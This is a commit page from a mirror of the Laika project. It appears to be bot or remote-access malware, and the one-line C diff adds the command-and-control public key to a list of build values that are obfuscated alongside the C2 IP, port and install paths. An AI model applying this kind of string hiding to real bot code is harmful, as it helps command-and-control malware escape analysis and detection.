1
0
mirror of https://github.com/CPunch/Laika.git synced 2025-10-15 03:50:08 +00:00

Bot: Obfuscated CNC public key

This commit is contained in:
2022-05-27 17:51:10 -05:00
parent 0fdca35f87
commit fed78402a2
2 changed files with 5 additions and 1 deletions

View File

@@ -74,6 +74,7 @@ int main(int argv, char **argc) {
/* shared */
MAKESKIDDATA(LAIKA_CNC_IP);
MAKESKIDDATA(LAIKA_CNC_PORT);
MAKESKIDDATA(LAIKA_PUBKEY);
/* linux */
MAKESKIDDATA(LAIKA_LIN_LOCK_FILE);
MAKESKIDDATA(LAIKA_LIN_INSTALL_DIR);